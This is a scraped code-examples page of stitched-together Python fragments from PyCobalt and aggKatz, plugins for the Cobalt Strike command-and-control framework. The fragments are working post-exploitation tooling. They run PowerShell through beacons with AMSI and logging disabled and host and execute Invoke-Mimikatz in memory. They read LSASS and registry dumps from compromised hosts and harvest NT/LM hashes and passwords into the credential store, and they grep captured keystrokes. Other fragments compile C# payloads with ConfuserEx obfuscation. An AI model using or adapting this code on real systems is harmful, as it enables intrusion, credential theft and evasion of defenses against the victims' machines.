Ejemplo n.º 1
0
def _(*args):
    parser = helpers.ArgumentParser(
        prog='logs', description='Get logs for a user or computer')
    parser.add_argument('-c', '--computer', help='Get logs for computer')
    parser.add_argument('-u', '--user', help='Get logs for user')
    parser.add_argument('out', help='Output file')
    try:
        args = parser.parse_args(args)
    except:
        return

    finds = 0
    for frame in aggressor.data_query('beaconlog'):
        output_type = frame[0]
        bid = frame[1]
        if output_type == 'beacon_input':
            user = frame[2]
            data = frame[3]
            time = convert_time(frame[4])
        else:
            data = frame[2]
            time = convert_time(frame[3])

        user = aggressor.beacon_info(bid, 'user')
        computer = aggressor.beacon_info(bid, 'computer')

        if user == args.user or computer == args.computer:
            # it's a match!
            finds += 1

            # -o/--out
            with open(args.out, 'a+') as fp:
                fp.write(data)

    engine.message('Wrote {} finds to {}'.format(finds, args.out))
Ejemplo n.º 2
0
def prune_dead():
    for beacon in aggressor.beacons():
        if beacon['alive'] == 'false':
            bid = beacon['id']
            engine.message('removing beacon {} ({}@{})'.format(
                bid, beacon['user'], beacon['computer']))
            aggressor.beacon_remove(bid)
Ejemplo n.º 3
0
def custom_powerpick(bid, command, silent=False, auto_host=True):
    # public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
    code = helpers.code_string(r"""
    string powershell = String.Join("\n", args);
    var results = Execution.PowerShell.RunAsync(powershell, disableLogging: true, disableAmsi: true, bypassExecutionPolicy: true);
    foreach (string result in results) {
        Console.Write(result);
    }
    """)

    if not silent:
        aggressor.btask(
            bid, 'Tasked beacon to run: {} (custom unmanaged)'.format(
                command.replace('\n', ' ')))

    # include cradle for `powershell-import`/`bpowershell_import`
    cradle = aggressor.beacon_host_imported_script(bid)
    if cradle:
        command = cradle + '\n' + command

    # if the script is too long, host it
    if auto_host and len(command) > max_script_size:
        command = aggressor.beacon_host_script(bid, command)

    engine.message(command)
    references = [
        'mscorlib.dll', 'System.dll', 'System.Core.dll',
        'System.Management.Automation.dll'
    ]
    sharpgen.execute(bid,
                     code, [''] + command.split('\n'),
                     references=references,
                     resources=[],
                     cache=sharpgen_cache)
Ejemplo n.º 4
0
def _(source, out, *args):
    engine.message('Compiling C# code from: {}'.format(source))
    try:
        sharpgen.compile_file(source, out=out, additional_options=args)
        engine.message('All finished! Output is in: {}'.format(out))
    except RuntimeError as e:
        engine.error('SharpGen failed. See above for more details')
Ejemplo n.º 5
0
    def read(self, n=-1):
        #engine.message('read %s' % n)
        if n == 0:
            return b''

        if n != -1:
            for section in self.cache:
                if section.inrange(self.curpos, n) is True:
                    #engine.message(n)
                    data = section.read(self.curpos, n)
                    #engine.message(data)
                    self.seek(n, 1)
                    return data

        # requested data not found in cache, this case we will read a larger chunk than requested and store it in memory
        # since reading more data skews the current position we will need to reset the position by calling seek with the correct pos

        readsize = min(self.maxreadsize, n)
        readsize = max(self.minreadsize, readsize)
        buffer = b''

        engine.message('READ offset %s' % self.curpos)
        engine.message('READ N %s' % n)

        # this is needed bc sometimes the readsize is smaller than the requested amount
        for _ in range(int(math.ceil(n / readsize))):
            data = self.__bacon_read(readsize, self.curpos + len(buffer))
            buffer += data

        section = FileSection(self.curpos, buffer)
        self.cache.append(section)

        data = section.read(self.curpos, n)
        self.seek(self.curpos + n, 0)
        return data
Ejemplo n.º 6
0
def _(mode):
    if mode == 'on':
        engine.message('Enabled custom powerpick')
        enable_custom_powerpick()
    elif mode == 'off':
        engine.message('Disabled custom powerpick')
        disable_custom_powerpick()
    else:
        engine.error('Usage: custom-powerpick on|off')
Ejemplo n.º 7
0
def _(mode):
    if mode == 'on':
        sharpgen.set_confuser_protections(config.protections_net35)
        engine.message('Enabled SharpGen ConfuserEx protections')
    elif mode == 'off':
        sharpgen.set_confuser_protections(None)
        engine.message('Disabled SharpGen ConfuserEx protections')
    else:
        engine.error('Usage: sharpgen-confuser on|off')
Ejemplo n.º 8
0
def _(mode):
    if mode == 'on':
        sharpgen.enable_cache_overwrite()
        engine.message('Enabled SharpGen cache overwrite')
    elif mode == 'off':
        sharpgen.disable_cache_overwrite()
        engine.message('Disabled SharpGen cache overwrite')
    else:
        engine.error('Usage: sharpgen-cache-overwrite on|off')
Ejemplo n.º 9
0
def dialog_callback_lsass(dialog, button_name, values_dict):
    engine.message('dialog_callback_lsass invoked!')
    engine.message('button_name %s' % button_name)
    engine.message('values_dict %s' % str(values_dict))

    chunksize = int(values_dict['chunksize']) * 1024
    filepath = values_dict['filepath']
    boffilepath = values_dict['boffilepath']
    bid = values_dict['bid']
    packages = []
    outputs = []

    try:
        with open(boffilepath, 'rb') as f:
            f.read(100)
    except Exception as e:
        aggressor.show_error(
            "Can't open BOF file! Did you get the path correct? Reason: %s" %
            e)
        return

    for pkg in [
            'all', 'msv', 'wdigest', 'kerberos', 'ktickets', 'ssp', 'livessp',
            'tspkg', 'cloudap'
    ]:
        if pkg in values_dict and values_dict[pkg] == 'true':
            packages.append(pkg)

    if len(packages) == 0:
        aggressor.show_error(
            "No packages were defined! LSASS parsing will not start!")
        return

    for output in ['json', 'text', 'grep']:
        if output in values_dict and values_dict[output] == 'true':
            outputs.append(output)

    if len(outputs) == 0:
        aggressor.show_error(
            "No output format(s) selected! LSASS parsing will not start!")
        return

    to_delete = True if values_dict['delete'] == 'true' else False
    add_creds = True if values_dict['credadd'] == 'true' else False

    engine.message('to_delete %s' % repr(to_delete))
    engine.message('add_creds %s' % repr(add_creds))

    parse_lsass(bid,
                filepath,
                boffilepath,
                chunksize,
                packages=packages,
                outputs=outputs,
                to_delete=to_delete,
                add_creds=add_creds)
Ejemplo n.º 10
0
def prune_old(hours):
    for beacon in aggressor.beacons():
        last = int(beacon['last'])

        if older_than(last, hours):
            bid = beacon['id']
            last_hours = last / 1000 / 60 / 60
            engine.message('removing beacon {} ({}@{}) ({} hours old)'.format(
                bid, beacon['user'], beacon['computer'], int(last_hours)))
            aggressor.beacon_remove(bid)
Ejemplo n.º 11
0
def _(*args):
    parser = helpers.ArgumentParser(prog='logs', description='Get logs for a user or computer')
    parser.add_argument('-c', '--computer', help='Get logs for computer')
    parser.add_argument('-u', '--user', help='Get logs for user')
    parser.add_argument('out', help='Output file')
    try: args = parser.parse_args(args)
    except: return

    finds = get_logs(args.out, user=args.user, computer=args.computer)
    engine.message('Wrote {} log entries to: {}'.format(finds, args.out))
Ejemplo n.º 12
0
def _(bid, command, *args):
    script_file = utils.basedir(
        'powershell/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1')
    with open(script_file, 'r') as fp:
        script = fp.read()

    # host it
    cmd = aggressor.beacon_host_script(bid, script)
    time.sleep(10)

    # execute in-memory hosted script
    engine.message(cmd)
    aggressor.bpowerpick(
        bid, cmd + ';\n Invoke-Mimikatz -Command {} {}'.format(
            command, ' '.join(powershell_quote(args))))
Ejemplo n.º 13
0
def _(regex):
    found = False
    engine.message("Searching keystrokes for '{}'".format(regex))
    for frame in aggressor.data_query('keystrokes'):
        data = frame['data']
        bid = frame['bid']
        time = convert_time(frame['when'])
        beacon = '{}@{}'.format(aggressor.beacon_info(bid, 'user'), aggressor.beacon_info(bid, 'computer'))

        for line in data.splitlines():
            if re.search(regex, line, re.IGNORECASE):
                engine.message("Found keystroke matching '{}' from {} at {}: {}".format(regex, beacon, time, line))
                found = True

    if not found:
        engine.error("Didn't find any keystrokes containing '{}'".format(regex))
Ejemplo n.º 14
0
    def __bacon_read(self, n, offset):
        engine.message('replyid %s' % self.replyid)
        engine.message('offset %s' % offset)
        engine.message('N %s' % n)
        engine.message('bof_path %s' % self.bof_path)
        engine.message('start reading....')
        engine.call('rfs', [
            self.bacon_id, self.bof_path, self.filepath, n, offset,
            self.replyid
        ])

        # dont ask... just dont...
        # manual callback processing because of blocking thread stops the entire execution
        for name, message in engine.read_pipe_iter():
            #engine.message('readiter')
            #engine.message(name)
            #engine.message(message)

            if name == 'callback':
                # dispatch callback
                callback_name = message['name']
                callback_args = message['args'] if 'args' in message else []

                if callback_name.startswith('event_beacon_output') is True:
                    if callback_args[0] == str(self.bacon_id):
                        data = callback_args[1].replace(
                            'received output:\n', '')
                        data = data.replace('\n', '').strip()
                        #engine.message('!data!: %s' % data)
                        if data.startswith('[DATA]') is True:
                            data = data.split(' ')[1]
                            #print(base64.b64decode(data))
                            return base64.b64decode(data)
                        elif data.startswith('[FAIL]') is True:
                            raise Exception('File read failed! %s' % data)
            else:
                try:
                    engine.handle_message(name, message)
                except Exception as e:
                    engine.handle_exception_softly(e)
Ejemplo n.º 15
0
def _(*args):
    parser = helpers.ArgumentParser(prog='grep-logs', description='Grep beacon logs for a regex')
    parser.add_argument('-o', '--out', help='Output file')
    parser.add_argument('-w', '--whole', action='store_true', help='Show whole output')
    parser.add_argument('regex', action='append', help='Search for regex')
    try: args = parser.parse_args(args)
    except: return

    for regex in args.regex:
        finds = 0
        engine.message("Searching beacon logs for '{}'".format(regex))
        for frame in aggressor.data_query('beaconlog'):
            output_type = frame[0]
            bid = frame[1]
            if output_type == 'beacon_input':
                user = frame[2]
                data = frame[3]
                time = convert_time(frame[4])
            else:
                data = frame[2]
                time = convert_time(frame[3])

            for log in split_output(data):
                if re.search(regex, log, re.IGNORECASE):
                    beacon = '{}@{}'.format(aggressor.beacon_info(bid, 'user'), aggressor.beacon_info(bid, 'computer'))

                    # -w/--whole
                    if args.whole:
                        output = data
                    else:
                        output = log

                    # -o/--out
                    if args.out:
                        with open(args.out, 'a+') as fp:
                            fp.write(output)
                    else:
                        engine.message("Found beacon log matching '{}' from {} at {}:\n{}".format(regex, beacon, time, output))

                    finds += 1

        if finds:
            if args.out:
                engine.message("Wrote {} finds containing '{}' to '{}'".format(finds, regex, args.out))
            else:
                engine.message("Found {} logs containing '{}'".format(finds, regex))
        else:
            engine.error("Didn't find any beacon logs containing '{}'".format(regex))
Ejemplo n.º 16
0
    def ls_callback(bid, directory, content):
        engine.message('callback in: ' + directory)
        files = parse_ls(content)
        for f in files:
            path = r'{}\{}'.format(directory, f['name'])

            if f['type'] == 'D':
                # recurse
                engine.message('recursing: ' + path)
                recurse_ls(bid, path, callback, depth=depth - 1)
            else:
                engine.message('calling for: ' + path)
                callback(path)
Ejemplo n.º 17
0
def _(source, out=None, *sharpgen_flags):
    engine.message('Compiling C# code from: {}'.format(source))
    try:
        out, from_cache = sharpgen.compile_file(
            source, out=out, additional_options=sharpgen_flags, cache=cache)

        if from_cache:
            engine.message(
                'Build was found in the cache! Output is in: {}'.format(out))
        else:
            engine.message(
                'Build was successful! Output is in: {}'.format(out))
    except RuntimeError as e:
        engine.error('SharpGen failed. See above for more details.')
Ejemplo n.º 18
0
def dialog_callback_registry(dialog, button_name, values_dict):
    engine.message('dialog_callback_lsass invoked!')
    engine.message('button_name %s' % button_name)
    engine.message('values_dict %s' % str(values_dict))

    chunksize = int(values_dict['chunksize']) * 1024
    system_filepath = values_dict['system_filepath']
    sam_filepath = values_dict['sam_filepath']
    security_filepath = values_dict['security_filepath']
    software_filepath = values_dict['software_filepath']
    boffilepath = values_dict['boffilepath']
    bid = values_dict['bid']
    outputs = []

    try:
        with open(boffilepath, 'rb') as f:
            f.read(100)
    except Exception as e:
        aggressor.show_error(
            "Can't open BOF file! Did you get the path correct? Reason: %s" %
            e)
        return

    for output in ['json', 'text', 'grep']:
        if output in values_dict and values_dict[output] == 'true':
            outputs.append(output)

    if len(outputs) == 0:
        aggressor.show_error(
            "No output format(s) selected! LSASS parsing will not start!")
        return

    parse_registry(bid,
                   boffilepath,
                   system_filepath,
                   sam_filepath=sam_filepath,
                   security_filepath=security_filepath,
                   software_filepath=software_filepath,
                   chunksize=chunksize,
                   outputs=outputs)
Ejemplo n.º 19
0
def compile(
                # Input options
                source,

                # Wrapper options
                use_wrapper=True,
                assembly_name=None,
                class_name=None,
                function_name=None,
                function_type=None,
                using=None,
                add_using=None,

                # Compilation options
                output_kind='console',
                platform='AnyCpu',
                dotnet_framework=None, 
                optimization=True,
                out=None,

                # Confuser options
                confuser_config=None,
                confuser_protections=None,

                # Additional SharpGen options (passed through raw)
                additional_options=None,

                # Resources/references
                resources=None,
                references=None,
                add_resources=None,
                add_references=None,

                # Cache options
                cache=None,
                cache_overwrite=None,
                no_cache_write=False,

                # Dependency info
                sharpgen_location=None,
                sharpgen_runner=None
           ):
    """
    Compile some C# code using SharpGen.

    :param source: Source to compile

    :param use_wrapper: Use a class and function Main code wrapper (default: True)
    :param class_name: Name of generated class (default: random)
    :param function_name: Name of function for wrapper (default: Main for .exe, Execute for .dll)
    :param function_type: Function return type (default: void for .exe, object for .dll)
    :param using: Namespaces to use (C# `using`) in the wrapper. See
                  `sharpgen.set_using()` for more information.
    :param add_using: Additional namespaces to use (C# `using`) in the wrapper.
                      These are added on top of the defaults. See
                      `sharpgen.set_using()` for more information.

    :param assembly_name: Name of generated assembly (default: random)
    :param output_kind: Type of output (exe/console or dll/library) (default: console)
    :param platform: Platform to compile for (any/AnyCpu, x86, or x64) (default: AnyCpu)
    :param confuser_config: ConfuserEx configuration file. Set a default for this
                            option with `set_confuser_config(<file>)`.
    :param confuser_protections: ConfuserEx protections to enable. Setting this
                                 argument will generate a temporary ConfuserEx
                                 config file for this build. For more
                                 information and to set a default for this
                                 option see `set_confuser_protections(<protections>)`.
    :param dotnet_framework: .NET Framework version to compile against
                             (net35 or net40) (default: value passed to
                             `set_dotnet_framework(<version>)` or net35)
    :param optimization: Perform code optimization (default: True)
    :param out: Output file (default: file in /tmp)

    :param additional_options: List of additional SharpGen options/flags
                               (passed through raw)

    :param resources: List of resources to whitelist (by Name). This option
                      temporarily modifies your `resources.yml` file so listed
                      resources must be present in that file. By default
                      resources.yml will not be touched. Call
                      `set_resources(<resources>)` to change the default.
    :param references: List of references to whitelist (by File). This option
                      temporarily modifies your `references.yml` file so listed
                      references must be present in that file. By default
                       references.yml will not be touched. Call
                      `set_references(<references>)` to change the default.
    :param add_resources: List of resources to add, on top of the defaults (see
                          `set_resources(<resources>)`)
    :param add_references: List of references to add, on top of the defaults
                           (see `set_references(<references>)`)

    :param cache: Use the build cache. Not setting this option will use the
                  global settings (`enable_cache()`/`disable_cache()`). By
                  default the build cache is off.
    :param cache_overwrite: Force overwriting this build in the cache (disable
                            cache retrieval but not writing). The default is
                            `False` unless `enable_cache_overwrite()` is called.
    :param no_cache_write: Allow for cache retrieval but not cache writing

    :param sharpgen_location: Location of SharpGen directory (default: location
                              passed to `set_location()` or PyCobalt repo copy)
    :param sharpgen_runner: Program used to run the SharpGen dll (default:
                            sharpgen.default_runner or 'dotnet')

    :return: Tuple containing (out, cached) where `out` is the name of the
             output file and `cached` is a boolean containing True if the build
             is from the build cache
    :raises RuntimeError: If one of the options is invalid
    """

    # check output_kind
    if output_kind not in ('exe', 'console', 'dll', 'library'):
        raise RuntimeError('Argument output_kind must be exe/console or dll/library')
    if output_kind == 'exe':
        output_kind = 'console'
    if output_kind == 'library':
        output_kind = 'dll'

    # check dotnet_framework
    if not dotnet_framework:
        global _default_dotnet_framework
        dotnet_framework = _default_dotnet_framework
    if dotnet_framework not in ('net35', 'net40'):
        raise RuntimeError('Argument dotnet_framework must be net35 or net40')

    if not out:
        # use a temporary output file
        if output_kind == 'dll':
            suffix = '_build.dll'
        else:
            suffix = '_build.exe'
        out = tempfile.NamedTemporaryFile(prefix='pycobalt.sharpgen.', suffix=suffix, delete=False).name

    # cache settings
    # set default cache_overwrite
    global _default_cache_overwrite
    if not cache_overwrite is None:
        cache_overwrite = _default_cache_overwrite

    # determine cache write and retrieval settings based on `cache`,
    # `cache_overwrite`, and `no_cache_write`
    global _default_cache_enabled
    if cache is None:
        # use global settings
        cache_write = _default_cache_enabled and not no_cache_write
        cache_retrieval = _default_cache_enabled and not cache_overwrite
    else:
        # override global settings
        cache_write = cache and not no_cache_write
        cache_retrieval = cache and not cache_overwrite

    if cache_retrieval or cache_write:
        # get cache source hash
        source_hash = cache_source_hash(source)

    if cache_retrieval:
        # try to retrieve build from cache
        if cache_retrieve(source_hash, out):
            # successfully retrieved file from the cache
            engine.debug('Retrieved {} from the SharpGen cache'.format(source_hash))
            return out, True

    # default sharpgen_location
    if not sharpgen_location:
        global _sharpgen_location
        sharpgen_location = _sharpgen_location

    # find SharpGen.dll
    sharpgen_dll = _find_sharpgen_dll(_sharpgen_location)

    # wrapper options
    if use_wrapper:
        if not function_name:
            if output_kind == 'dll':
                function_name = 'Execute'
            else:
                function_name = 'Main'

        if not function_type:
            if output_kind == 'dll':
                function_type = 'object'
            else:
                function_type = 'void'

        if not using:
            # default is sharpgen.default_using
            global default_using
            using = default_using

        if add_using:
            using += add_using

        # de-duplicate using
        using = list(set(using))

        source = wrap_code(source, function_name=function_name,
                           function_type=function_type, class_name=class_name,
                           using=using)

    # check platform
    platform = platform.lower()
    if platform not in ('any', 'anycpu', 'x86', 'x64'):
        raise RuntimeError('Argument platform must be any/AnyCpu, x86, or x64')
    if platform in ('any', 'anycpu'):
        platform = 'AnyCpu'

    args = []

    # compiler options
    args += ['--dotnet-framework', dotnet_framework,
             '--output-kind', output_kind,
             '--platform', platform]

    if not optimization:
        args.append('--no-optimization')

    if assembly_name:
        args += ['--assembly-name', assembly_name]

    # ConfuserEx config
    # if neither flag is passed, pick a global default
    if not (confuser_config or confuser_protections):
        global _default_confuser_config
        global _default_confuser_protections

        # prefer `set_confuser_config()` over `set_confuser_protections()`
        if _default_confuser_config:
            confuser_config = _default_confuser_config
        elif _default_confuser_protections:
            confuser_protections = _default_confuser_protections

    # check to make sure both arguments were not passed
    if confuser_protections and confuser_config:
        raise RuntimeError('Arguments confuser_protections and confuser_config are not compatible together')

    # if confuser_protections is passed generate a ConfuserEx config file
    confuser_tempfile = None
    if confuser_protections:
        # this is cleaned up way at the bottom of the function
        confuser_tempfile = tempfile.NamedTemporaryFile('w+',
                prefix='pycobalt.sharpgen.', suffix='_confuser_config.cr')

        config = generate_confuser_config(confuser_protections)

        engine.debug('Confuser config: ' + config)

        confuser_tempfile.write(config)
        confuser_tempfile.flush()

        confuser_config = confuser_tempfile.name

    if confuser_config:
        args += ['--confuse', confuser_config]

    # additional options
    if additional_options:
        args += additional_options

    def filter_yaml(yaml, key, enabled_items):
        """
        Filter references.yml or resources.yml

        :param yaml: Original yaml
        :param key: Key to filter on
        :param enabled_items: Values to filter on
        :return: Filtered yaml
        """

        # parse content
        items = utils.yaml_basic_load(yaml)

        # filter out the items we want
        for item in items:
            if item[key].lower() in [item.lower() for item in enabled_items]:
                item['Enabled'] = 'true'
            else:
                item['Enabled'] = 'false'

        # dump new yaml
        return utils.yaml_basic_dump(items)

    resources_yaml_file = '{}/Resources/resources.yml'.format(sharpgen_location)
    references_yaml_file = '{}/References/references.yml'.format(sharpgen_location)

    original_resources_yaml = None
    original_references_yaml = None

    # figure out resources behavior
    global default_resources
    if resources is None:
        resources = default_resources

    if add_resources:
        if resources in (None, no_changes):
            resources = add_resources
        else:
            resources.extend(add_resources)

    # de-duplicate resources
    if resources is not no_changes:
        resources = list(set(resources))

    # figure out references behavior
    global default_references
    if references is None:
        references = default_references

    if add_references:
        if references in (None, no_changes):
            references = add_references
        else:
            references.extend(add_references)

    # de-duplicate references
    if references is not no_changes:
        references = list(set(references))

    # this feels a bit ugly but I can't think of a better way to do it
    try:
        # pick resources?
        if resources is not no_changes:
            # read in original yaml
            with open(resources_yaml_file, 'r') as fp:
                original_resources_yaml = fp.read()

            # filter yaml
            new_yaml = filter_yaml(original_resources_yaml, 'Name', resources)

            engine.debug('Temporarily overwriting {} with:\n{}'.format(resources_yaml_file, new_yaml))

            # overwrite yaml file with new yaml
            with open(resources_yaml_file, 'w+') as fp:
                fp.write(new_yaml)

        # pick references?
        if references is not no_changes:
            # read in original yaml
            with open(references_yaml_file, 'r') as fp:
                original_references_yaml = fp.read()

            # filter yaml
            new_yaml = filter_yaml(original_references_yaml, 'File', references)

            engine.debug('Temporarily overwriting {} with:\n{}'.format(references_yaml_file, new_yaml))

            # overwrite yaml file with new yaml
            with open(references_yaml_file, 'w+') as fp:
                fp.write(new_yaml)

        # write source to a file and build it
        with tempfile.NamedTemporaryFile('w+', prefix='pycobalt.sharpgen.', suffix='_code.cs') as source_file:
            source_file.write(source)
            source_file.flush()

            # in and out
            args += ['--file', out,
                     '--source-file', source_file.name]

            if not sharpgen_runner:
                # default sharpgen_runner is default_runner ('dotnet' by
                # default)
                global default_runner
                sharpgen_runner = default_runner

            # call the SharpGen dll
            args = [sharpgen_runner, sharpgen_dll] + args
            #engine.debug('Compiling code: ' + source)
            #engine.debug('Running SharpGen: {}'.format(' '.join(args)))

            code, output, _ = helpers.capture(args, merge_stderr=True)
            output = output.decode()

            #engine.debug('Finished running SharpGen')

        if code != 0 or not os.path.isfile(out) or not os.path.getsize(out):
            # SharpGen failed
            engine.message('SharpGen invocation: {}'.format(' '.join(args)))
            engine.message('SharpGen error code: {}'.format(code))
            engine.message('SharpGen error output:\n' + output)
            engine.message('End SharpGen error output')

            if os.path.isfile(out):
                os.remove(out)

            raise RuntimeError('SharpGen failed with code {}'.format(code))
        else:
            engine.debug('SharpGen return: {}'.format(code))
            engine.debug('SharpGen output: {}'.format(output))
    finally:
        if original_resources_yaml:
            # set the resources yaml back to the original
            with open(resources_yaml_file, 'w+') as fp:
                fp.write(original_resources_yaml)

        if original_references_yaml:
            # set the references yaml back to the original
            with open(references_yaml_file, 'w+') as fp:
                fp.write(original_references_yaml)

    if cache_write and os.path.isfile(out):
        # copy build to the cache
        engine.debug('Adding {} to SharpGen cache'.format(source_hash))
        _cache_add(source_hash, out)

    if confuser_tempfile:
        # we have to explictly close the tempfile here. otherwise python's
        # garbage collector might "optimize" out the object early, causing the
        # file to be deleted.
        confuser_tempfile.close()

    return out, False
Ejemplo n.º 20
0
def compile_file(
                    # Input options
                    source,

                    # SharpGen options
                    dotnet_framework='net35', output_kind='console', platform='x86',
                    no_optimization=False, assembly_name=None, class_name=None,
                    confuse=None, out=None,

                    # Additional SharpGen options (passed through raw)
                    additional_options=None,

                    # Resources/references
                    resources=None,
                    references=None,

                    # Dependency info
                    sharpgen_location=None
                ):
    """
    Compile a file using SharpGen.

    :param source: File name to compile
    :param dotnet_framework: .NET version to compile against (net35 or net40) (SharpGen's --dotnet-framework)
    :param output_kind: Type of output (console or dll) (SharpGen's --output-kind)
    :param platform: Platform to compile for (AnyCpy, x86, or x64) (SharpGen's --platform)
    :param no_optimization: Do not perform code optimization (SharpGen's --no-optimization)
    :param assembly_name: Name of generated assembly (SharpGen's --assembly-name)
    :param class_name: Name of generated class (SharpGen's --class-name)
    :param confuse: ConfuserEx configuration file (SharpGen's --confuse)
    :param out: Output file (SharpGen's --file)
    :param additional_options: List of additional SharpGen options/flags
                               (passed through raw)
    :param resources: List of resources to include (by Name). These must be
                      present in your resources.yml file.
    :param references: List of references to include (by File). These must be
                       present in your references.yml file.
    :param sharpgen_location: Location of SharpGen directory (default: location
                              passed to `set_location()` or repo copy)
    :return: Name of output file
    :raises: RuntimeError: If one of the options is invalid
    """

    global _sharpgen_location

    # default sharpgen_location
    if not sharpgen_location:
        sharpgen_location = _sharpgen_location

    sharpgen_dll = _find_sharpgen_dll(_sharpgen_location)

    # python 3.5 typing is still too new so I do this instead
    # check dotnet_framework
    if dotnet_framework not in ['net35', 'net40']:
        raise RuntimeError('compile_file: dotnet_framework must be net35 or net40')

    # check output_kind
    if output_kind not in ['console', 'dll']:
        raise RuntimeError('compile_file: output_kind must be console or dll')

    # check platform
    if platform not in ['AnyCpy', 'x86', 'x64']:
        raise RuntimeError('compile_file: platform must be AnyCpy, x86, or x64')

    args = ['dotnet', sharpgen_dll,
            '--dotnet-framework', dotnet_framework,
            '--output-kind', output_kind,
            '--platform', platform]

    # other options
    if no_optimization:
        args.append('--no-optimization')

    if assembly_name:
        args += ['--assembly-name', assembly_name]

    if class_name:
        args += ['--class-name', class_name]

    if confuse:
        args += ['--confuse', confuse]

    if additional_options:
        args += additional_options

    resources_yaml_overwritten = False
    references_yaml_overwritten = False

    # this is a bit ugly but I can't think of a better way to do it
    try:
        if resources is not None:
            # pick resources
            resources_yaml_file = '{}/Resources/resources.yml'.format(sharpgen_location)

            # read in original yaml
            with open(resources_yaml_file, 'r') as fp:
                original_resources_yaml = fp.read()

            # and parse it
            items = utils.yaml_basic_load(original_resources_yaml)

            # filter out the items we want
            for item in items:
                if item['Name'] in resources:
                    item['Enabled'] = 'true'
                else:
                    item['Enabled'] = 'false'

            # overwrite yaml file with new yaml
            with open(resources_yaml_file, 'w+') as fp:
                new_yaml = utils.yaml_basic_dump(items)
                fp.write(new_yaml)

            resources_yaml_overwritten = True

        if references is not None:
            # pick references
            references_yaml_file = '{}/References/references.yml'.format(sharpgen_location)

            # read in original yaml
            with open(references_yaml_file, 'r') as fp:
                original_references_yaml = fp.read()

            # and parse it
            items = utils.yaml_basic_load(original_references_yaml)

            # filter out the items we want
            for item in items:
                if item['File'] in references:
                    item['Enabled'] = 'true'
                else:
                    item['Enabled'] = 'false'

            # overwrite yaml file with new yaml
            with open(references_yaml_file, 'w+') as fp:
                new_yaml = utils.yaml_basic_dump(items)
                fp.write(new_yaml)

            references_yaml_overwritten = True

        if not out:
            # use a temporary file
            if output_type == 'dll':
                suffix = '.dll'
            else:
                suffix = '.exe'
            out = tempfile.NamedTemporaryFile(prefix='pycobalt.sharpgen.', suffix=suffix, delete=False).name

        args += ['--file', out,
                 '--source-file', source]

        engine.debug('running SharpGen: ' + ' '.join(args)) 
        code, output, _ = helpers.capture(args, merge_stderr=True)
        output = output.decode()
        engine.debug('SharpGen return: {}'.format(code))
        engine.debug('SharpGen output: {}'.format(output))

        if code != 0:
            # SharpGen failed
            engine.message('SharpGen invocation: {}'.format(' '.join(args)))
            engine.message('SharpGen error code: {}'.format(code))
            engine.message('SharpGen error output:\n' + output)
            engine.message('End SharpGen error output')
            raise RuntimeError('SharpGen failed with code {}'.format(code))
    finally:
        if resources_yaml_overwritten:
            # set the resources yaml back to the original
            with open(resources_yaml_file, 'w+') as fp:
                fp.write(original_resources_yaml)

        if references_yaml_overwritten:
            # set the references yaml back to the original
            with open(references_yaml_file, 'w+') as fp:
                fp.write(original_references_yaml)

    return out
Ejemplo n.º 21
0
def _():
    sharpgen.clear_cache()
    engine.message('Cleared the SharpGen build cache')
Ejemplo n.º 22
0
def suicide_callback(bids, b=None, c=None):
    engine.message('bc')
    engine.message(b)
    engine.message(c)
    for bid in bids:
        cleanup.suicide(bid)
Ejemplo n.º 23
0
menu = gui.popup('beacon_top',
                 callback=beacon_top_callback,
                 children=[
                     gui.menu('pypyKatz',
                              children=[
                                  gui.insert_menu('pypykatz_top'),
                                  gui.item('LSASS dump parse',
                                           callback=lsass_start_cb),
                                  gui.separator(),
                                  gui.item('REGISTRY dump parse',
                                           callback=registry_start_cb),
                              ]),
                 ])
gui.register(menu)

engine.message('')
engine.message('')
engine.message(
    '****************************************************************')
engine.message(
    '*                                                              *')
engine.message(
    '* aggKatz - pypyKatz Agressor plugin powered by pycobalt       *')
engine.message(
    '*                                                              *')
engine.message(
    '*                                                              *')
engine.message(
    '* Author: Tamas Jos @skelsec                                   *')
engine.message(
    '* Sponsor: Sec-Consult                                         *')
Ejemplo n.º 24
0
def parse_lsass(bid,
                filepath,
                boffilepath,
                chunksize,
                packages=['all'],
                outputs=['text'],
                to_delete=False,
                add_creds=True):

    engine.message('parse_lsass invoked')
    engine.message('bid %s' % bid)
    engine.message('filepath %s' % filepath)
    engine.message('chunksize %s' % chunksize)
    engine.message('packages %s' % (','.join(packages)))

    starttime = datetime.datetime.utcnow()
    bfile = BaconFileReader(bid, filepath, boffilepath, chunksize=chunksize)
    mimi = pypykatz.parse_minidump_external(bfile,
                                            chunksize=chunksize,
                                            packages=packages)
    engine.message(str(bfile))
    endtime = datetime.datetime.utcnow()
    runtime = (endtime - starttime).total_seconds()
    engine.message('TOTAL RUNTIME: %ss' % runtime)

    if 'text' in outputs:
        engine.message(str(mimi))
        aggressor.blog(bid, str(mimi))

    if 'json' in outputs:
        engine.message(mimi.to_json())
        aggressor.blog(bid, mimi.to_json())

    if 'grep' in outputs:
        engine.message(mimi.to_grep())
        aggressor.blog(bid, mimi.to_grep())

    if to_delete is True:
        engine.call('fdelete', [bid, boffilepath, filepath, 1])

    if add_creds is True:
        host = str(bid)
        for luid in mimi.logon_sessions:
            res = mimi.logon_sessions[luid].to_dict()
            for msv in res['msv_creds']:
                engine.message(repr(msv))
                if pwconv(msv['NThash']) is not None:
                    source = '[AGGROKATZ][%s][%s] LSASS dump %s' % (
                        'msv', 'NT', filepath)
                    aggressor.credential_add(str(msv['username']),
                                             pwconv(msv['NThash']),
                                             str(msv['domainname']), source,
                                             host)
                if pwconv(msv['LMHash']) is not None:
                    source = '[AGGROKATZ][%s][%s] LSASS dump %s' % (
                        'msv', 'LM', filepath)
                    aggressor.credential_add(str(msv['username']),
                                             pwconv(msv['LMHash']),
                                             str(msv['domainname']), source,
                                             host)

            for pkgt in [
                    'wdigest_creds', 'ssp_creds', 'livessp_creds',
                    'kerberos_creds', 'credman_creds', 'tspkg_creds'
            ]:
                for pkg in res[pkgt]:
                    if pwconv(pkg['password']) is not None:
                        source = '[AGGROKATZ][%s] LSASS dump %s' % (pkgt,
                                                                    filepath)
                        aggressor.credential_add(str(pkg['username']),
                                                 pwconv(pkg['password']),
                                                 str(pkg['domainname']),
                                                 source, host)
Ejemplo n.º 25
0
def parse_registry(bid,
                   boffilepath,
                   system_filepath,
                   sam_filepath=None,
                   security_filepath=None,
                   software_filepath=None,
                   chunksize=10240,
                   outputs=['text']):
    engine.message('parse_registry invoked')
    engine.message('bid %s' % bid)
    engine.message('system_filepath %s' % system_filepath)
